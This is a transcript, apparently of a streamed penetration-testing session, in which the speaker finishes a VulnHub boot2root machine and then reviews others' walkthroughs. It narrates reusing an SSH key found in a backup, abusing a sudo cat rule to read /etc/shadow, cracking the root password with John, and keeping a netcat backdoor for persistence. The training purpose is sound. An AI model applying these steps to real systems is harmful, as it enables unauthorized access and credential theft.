default, so they're in wheel, which is good to know. I'm in users. Was there anything useful for that? No. Hmm. Yeah. Hmm. So they're both in wheel. So if I can get to either one of those users, that'd be very, very useful. I'm in users, which so far isn't much, but you know. So we can do. Let's do some stuff. Let's do some post-exploitation recon. Find editable files Linux. There's a find and it's perm, I think, -perm. Or I don't even actually think it's that. It's I think there might be like a writable switch. Yeah, -writable. And I believe there's the same thing for readable as well. Find readable files Linux. It's not fully functional. It is anatomically correct, though. However, we're running a Linux system ourselves, so just man find. Yeah, readable works too. Cool. So we will find writable. Let's find readable first. Find literally anything. Come on. Maybe it doesn't know what readable is. Maybe that's new. So find perm, and we'll say other readable. Oh god. And then we will to into dev-null. So we're gonna reroute any errors like these permission denieds and shit out, because obviously we can't read those. Does not seem to be doing what I expect it to. Okay. So let's see. There's a bunch of stuff. So, I mean, there's probably a kernel vulnerability for this fucking thing. I still think cups might be too. Denial of service. Um, what? That's outstanding. Oh, cool. Apple can tell me. So cup stash config. Oh, that's the wrong box, obviously. Mm. So probably not the privesc here. It's oh man, for as much as I use this system, I really should get the database hooked up. That's surprising for me. Yeah, neither of those are useful. Um, let's see what the notes say on this. Oh, it's just another denial of service. So many denial of services. This is all just Apple. That's not useful. Is it? Hmm. Okay. Uh, Okay, well, I said at one point that if we get stuck, we have this this backup here. Let's take a look. Excuse me. Wait a minute. So there's sorry, I wasn't voicing what I was doing very well. So this said media backup, and because of crazy rapid random happenstance, that was what I was seeing below it, and I was like, well, I never checked and see if there was any like media mounted, and usually, you run this, see if there's anything mounted. We don't see anything, but when we're in media, we see a USB 1. Programming ground up, serial programming in POSIX OSs, make.pdf. All of that could be interesting, I guess. It's a little. Hopefully, those aren't copyrighted. What is keys? This is usually good. Is this somebody else's backup stuff? How do we get HBeals? So, cat ID RSA. I'm guessing that's probably this is probably the key itself. So, let's, we're going to download, what's the PWD? Nope. We're going to and we're going to, well, first things first, this key should really go in artifacts, and it's going to go into this artifacts. And we will SSH ID artifacts ID RSA. So the I just says I want to use this identity file. So we're gonna I artifacts ID RSA, and then we're gonna do the this is the HBeals, right? HBeal at 192.168.2.120. Host verification failed. Wait. Wait, when? Root. SH. Known hosts. Oh, does it change its host file every time it reboots? Because remember when we rebooted it, we were looking at this, generating SSH keys a bunch. So let's kill this. Come on. You know you want to work. Do it. The software, having trouble reading is that Poppet? The software is KeepNote. It's amazing. I love it because of the hierarchical setup that there is. It's recommended in the PWK class, the penetration testing with Kali Linux class, and I used it for that class. I used it for the OSCP test, and I just really enjoy it. The one thing that it's missing that I wish it had is some sort of cloud syncing capability. You can get away with putting it in a Dropbox or Google Drive or something, but it'd just be more convenient if it had its own functionality for that. But outside of that, it works great. And so you have to set specific permissions for keys. SSH won't let you if it's too permissive. So we're going to chmod 400, which is read only. It could be 600 as well if you want. I think some SSH lets you 600, some don't, which would be read write. We will do 400 just because, and ID RSA, and then boom. Come on, slow ass computer. Let me in. Huzzah! Okay, now, if we recall correctly, I want to put also, we're going to put this ID RSA under credentials. We're going to rename it to HBeal so that we know whose it is. And then under HBeal, we'll say, SSH key found in media USB 1. Was it stuff? Yeah, keys. Okay, so if we remember correctly, in our notes down here, in Etsy group, wheel is group 10. Wheel is pretty typically a sudoers group, somebody that can sudo. And if we look at Etsy password, we'll see that HBeal has sudo or a user or a group ID of 10. So he's part of the wheel group, which means we can likely sudo as them. So we'll go ahead and run sudo -l to see what their capabilities are. We're not allowed to run as root binls, user bin cat. Well, this is confusing. We're not allowed to do it, but we are allowed with no exec, but also no password. That's really confusing. If we do sudo cat Etsy shadow, is this going to work? It does work. Cool. So let's just, first of all, let's capture this. And then let's also capture this. Or can we, let's sudo cat Etsy sudoers. So we can cat basically whatever we want now, including that payroll file. So let's just add this, oops. And this is Etsy sudoers. So wheel, okay, I need to know what this directive does. Sudoers no exec. No exec and exec is compiled with no exec support and the underlying operating system. It's prevented dynamically linked executable from running for the commands itself. Oh, so it can't. Oh. So like, for instance, more, there is a thing in more and less in VI as well, where you can actually execute commands. I think it's like bang and then the command or something like that. So it's just saying that the command itself can't run more commands. So, for instance, like you can't user bin su as root in a command. Okay, I see what it's saying. I get it. Cool. but anyone can sudo cat just arbitrarily, which is a terrible, terrible idea. So where are those notes? Is J green, right? Yeah. So we are going to sudo cat that. Contractor name, monthly wage, paid from holding account, actual amount paid, margin taken. All right. So now we've got some payroll information. There's some legal ramifications with looking at this, copying this, whatever. I am not qualified to give instruction on what to do if you encounter something like this, or give legal counsel. However, what I would say is take a note that you had access to it. Take a note that if you wanted to, you could have read it, and include that in your report. If they ask for further proof during your readout or something, then you can, I don't know. I'm not a lawyer. Consult your lawyer. But definitely take a note that you could have and found it and got access to, but I wouldn't actually look at it because that could be very sensitive information, and suddenly you have a liability. So, but since this is not an actual pen test, actually this should be the whole. Since this is not a real pen test, we're just going to go ahead and capture this. Okay. So we've got Etsy Shadow, which gives us some passwords. So what can we do? Can we? Is that the only three? Actually, we can kind of close this down. We don't need this like netcat shell anymore, because we've got like legitimate access now. Now, that's not entirely true. It'd still be good to have a backdoor here, but we don't really need it. The reason it'd be good to have a backdoor is in case they rolled their credentials, they discovered something hinky going on, and they're like, oh man, I need to roll that. So we'll keep our C2, our quote unquote C2, what we're treating as our C2 here, in case something happens and we have to spin up a new, like a new thing. We could create a user if we really wanted to. I'm not a giant fan of that, but we could do that. Create extra keys. That might be a little more subtle, unless they're monitoring changes to like authorized keys files and stuff like that. But anyways, so what else can we do from here? Yeah, there's that key. So we should be let's do this. We're going to create a John unshadowed file. Oops. So we'll use the unshadow utility to, I think it's this way. Yeah, password, then shadow. And then we'll I always forget where they put rock U. Oh, I copied it there. Oh. Wow, that was fast. Oh man. So if we just su dash oh man, and now we're root. Cool. So we'll want to take a screenshot of the cracking. And when we actually do it in the report, we would black this out, right? Or, fuzz it or something. But just do that. And then we'd also take a screenshot of SUing. And we're basically done. I don't know if there's any flags. Here are those scripts that were running earlier that we used to get in originally. Looks like that runs every 10 minutes. So our luck of actually catching that at the right time and not having to finish our Python script was pretty incredible. That being said, we would have finished our Python script, a few minutes later, and then, I would have gotten up and got a beer while it ran. I don't know. So let's take a look. Just gonna close this out, right? We want to take a look at what this backup script does. Howard Beale to dump media backup to your backup server. So it was writing. Oh man. So it tars up backup, and then it just uses netcat to send it over the network. And so if we go back to this guy, let's just do this ID. I wonder if it's still there. It is still there. Cool. It looks like it couldn't write to it, and then no such file or directory. No space left. No space left. No space left. No space left. Interesting. So I assume there's some kind of listener on the other side of 240 is just like a netcat. So if we changed our IP address to this, and then if we changed our IP address to this and opened up port 10,000, we could have received this temp backup, which would have, if you remember, that's how we got into this machine as HBeal, was that we saw in media, we saw that USB image there. So this is USB 1 guy, and under stuff, that's where the authorized keys were, right? So if we would have just changed our IP address to 240 and opened up port 10,000, we would have received this stuff in that zip. And then we could have unpacked it, found it, and moved on. We didn't need to do that, and honestly, we wouldn't really know to do that otherwise. I guess we could have. I mean, we did start to listen with Wireshark, right? So if we would have seen on this page that it was trying to go to 240 specifically, we didn't see any traffic coming to us as our address, I think 128. We could have known that there was no 240 on the network currently. We could have changed our address to 240 and started listening, and we would have eventually gotten hit on 10,000. And then we could have said, okay, well, let's listen on 10,000, and could have listened on 10,000, received the backup, and then found the stuff. But by then, we had already found logs information. We had already found this. We saw, that's where the break was. I see. So the break was the fact that our mass scan saw the 10,001 port. So this could have been handled in two different ways, I guess. Is we were lucky enough to see the 10,001 port, which kind of accelerated our movement. Because I typed in help. I was like, what is this? Why can't I, why don't I get any feedback? And then I saw this help here. And I was like, oh man, is it really just giving us, like, echoing our input into a PHP page? The other way that it could have been done is you don't see that 10,001 port immediately. You impersonate 240, get the connection from 10,000, and then steal the key that way. Let's take a look at what log.sh does. So log.sh compress the backups. So it's the same thing. It just, oh wait, I'm sorry. I was still looking up here. Open port to, yeah. So it opens up 10,001, writes it directly to this backup log.php. And this should be a lesson to everyone. Logs should not be executable. There's no, it should not be PHP. If this was just backup log.txt, this would have never had this problem. But man, they really wanted to have this this timestamp here. What else fun stuff do we have in here? Do we have a history? No. I mean, no, none previous to us. Sometimes when people that make boot2roots are cleaning up, they don't clean up their history, and then you can kind of see them constructing, the boot2root, and you can see kind of what they were doing. The Lord of the Root was really fun because you can actually see, once you get in as that user, the root user, you can look at their browsing history and all that stuff, and you can see them looking up the vulnerabilities and stuff that they ended up using later to construct the challenge. So that's kind of fun. Have anything cool in? Nope. Well, I think that's it. I think that's all. It was only 2.5 hours. We did pretty well, I think. Starting from scratch. Generally, these things take me a lot longer, and maybe it's because this is older. It's not as complex. Like I said, it's one of the first ones on VulnHub. So, later ones, there's a lot to it, and they can take sometimes a full day, sometimes multiple days even. Luckily, that wasn't for us. Let's just quick check through our notes, make sure there's no outstanding things that we're confused about. We'll want to add these other screenshots to our notes. So su to root and crack root password. Derby didn't come up with anything else. I guess we can go see if there's anything more in that site. No. Yeah, that's it for there. said there's a CGI bin. What is 403? Forbidden. There is no. It doesn't exist. Yeah, it doesn't exist. Yeah, there's no mail here. So yeah, it looks like we're done. I don't think there's anything else in here. Let's just to kind of round this out, and this is what I do when I do the boot2roots ahead of time to like prepare for a stream or prepare for a video. Is I go back to once I think I'm done, right? I kind of explore everywhere. I go back to the download page and find there, see if they have any walkthroughs. And it looks like they do. Oh, that's a video walkthrough. Let's check this person. So let's see. So they did something similar to what we wanted to do. First, they found it, which I guess is weird because it tells you on the home screen that what its IP address was. But first, they found it using NetDiscover. They did an nmap similar to what we wanted to do. They either don't know the P-, or are just used to doing it this way, but they're using the automated or the default scripts, and then SS. Syn connect scan. Okay. So they're doing just specifying that type of scan. Yeah. So, yeah, clearly you don't want to check all the things. And they got lucky right off the bat too. So they found the 3 that we found, but then they didn't, at least they don't say that they had to run it multiple times, or they don't say that they ran up against walls and then went back to a scan. But they found their 10,001 right away, right? So try to log in with anonymous credentials, no luck. dir search to enumerate directories. Cool, I'll check that out. See, and this is why I read through these, because I don't always find everything, and sometimes I, discover new cool tools. So we'll check that out later. 3 directories, no valuable information. Examine the source. So we, he found the logs that or the credentials we found, logged into FTP like we did, and then found that page. So got stuck for a little while. So they jumped right onto the change your IP and changed it to 240 because he saw it in the report, and then listened on Wireshark, similar to something we did. Curiously enough, they also took the OSCP. So maybe that's just kind of through long, hard lessons of getting stuck over and over again. Listen to the wire is a good thing to remember. So they kind of went through scenario 2 that we just discussed earlier of, that's kind of the other way to do it if you don't automatically discover 10,001 and then try and, notice that it's like, oh, it's outputting the stuff I have. So they did that, saw some binary data come through, but they didn't analyze the data, and that could have jumped them pretty far ahead. So they didn't look at that data at all. They just saw the binary data come through, and that was it, which is a bit of a mistake, but that's fine. It looks like they probably got there in the end anyways. So they saw Before jumping in a rabbit hole, I immediately tried to connect to port 10,001. I got an empty shell with no output. It looks like it executed something and then opened up the port for a short period of time. So he tried to run a command like I tried to run help. It looks like he tried to run, ls or cat or etc password or cat etc password, and then saw it outputted. So they did something similar to what we did. Pretty close to exactly what we did. Let's see. So we're in Apache privileges, upgraded their shell like we did. Started off with kernel exploits. We never really did that. Obviously, we probably could have found something. Oops. We probably could have found something, but with boot2roots, generally you want to find the path that they intended you to find. So I leave kernel exploits to last results, like I'm really stuck, because that's almost never the right answer, right? Or at least not the answer they're intending. They usually have some puzzle in mind, which is why this is so fun. So, variation, kernel exploits, exploit Suggestor. He found the backup in Temp. He found it in. He found that it went to media. Let's see what they have in media. So kind of similar thing that we ran into, and then found the SSH private key. Which this step 8 could have actually happened like way up here in step 5 if you would have taken a look at that binary. So it's important. Again, we did something similar where we found the backup data and then put it away and didn't analyze it, and that cost us time as well, right? So just kind of analyze stuff as you find it, or if you have time, if it's not a race, which this wasn't. So he found the key. He copied the key. Tried brute forcing SSH using the names. So they didn't look at the authorized key that associated that was in that same directory, which is interesting. It's interesting that they didn't really think of that. But not everything's known. And he brute forced using the usernames in home, which is a good idea, or you could have used etc password. So he ran sudo -l like us. You can run cat, so grabbed SE shadow like we did. Ran it through John like we did. Boom, Formula 1. Boom, lessons learned. Yeah. So cool. I mean, it looks like we did everything. We can check out this other one too. I'm not gonna watch it. I'm not gonna have you guys watch me watch a video, but let's see if this person found anything else we didn't. So again, either just didn't talk about the process, or found 10,001 right off the bat. They're using some kind of terrible image hosting service. Log into FTP, found it. See, now they did the right thing. So they did a similar thing to the other person. They didn't jump to the conclusions that we were able to jump to, but they received the binary data, looked at the first few bytes, which is exactly what you should do if you get random binary data. You can either analyze the first few bytes or write it out to a file and just run file on it. That would have probably worked as well. Like if they would have just piped or redirected the output of their netcat into a file, and then ran file on it, I'm sure it would have popped up as a targz. But as it stands, he was able to do that. They were able to do that by analyzing the first couple bytes. And so they actually saw oh, they don't get the key. Interesting. So even though, huh. So it's just sending a different file. I don't think that backup script's actually running correctly. Because if it would have, uh, so long. Uh, and then oh, it's just wait. Oh, it wouldn't have sent the USB. Okay, so I'm not kicking myself too hard. We would have just gotten that backup data, which we got once we got a shell anyways. So we just kind of did things in a slightly reverse order, is all. We did all the steps, we just didn't do them in the same order that other people did. Lots of configuration stuff. Pixie boot, we found that, yeah. And then he made something very similar to what we were going to make. Excuse me, mouth's getting kind of dry. But I'm not going to take a break to get a drink because I think we're almost done. So, so the 10,001 port, chances are if we got lucky during the scan and caught it performing its backup routine. Found on the FTP server, logically presume, blah, blah, blah. So doing the script similar to what we would have done. Okay. Yeah, put through the exec. They use exec instead of pass through. There are several PHP things that can do similar, um, have similar results. So there's them going through that. I went through the kernel vulnerabilities, Hydra. You know what's funny? You know what's funny is if they would have just pointed Hydra at SSH root SSH using RockU, they absolutely would have just popped it immediately. Yeah, that would have been brutal. So, nothing in home directory, on folders, blah, blah, blah. Found the USB and media. Wide open private keys. Yep. Local key, so he SSH'd in. Found that you can catted Etsy shadow, cracked root. Then did some post exploitation similar to what I did. Looked at the cron tab, and then the two scripts. So cool. It looks like we finished. We did everything that there is to do on this, and groovy. That's it for today. Like I said, I'm going to do one a week. So when we finish it, we finish it. Sometimes it'll be a couple hours. Sometimes it'll be an all-day affair. Luckily, this one was not the latter. Thanks for tuning in, and we'll catch you next time.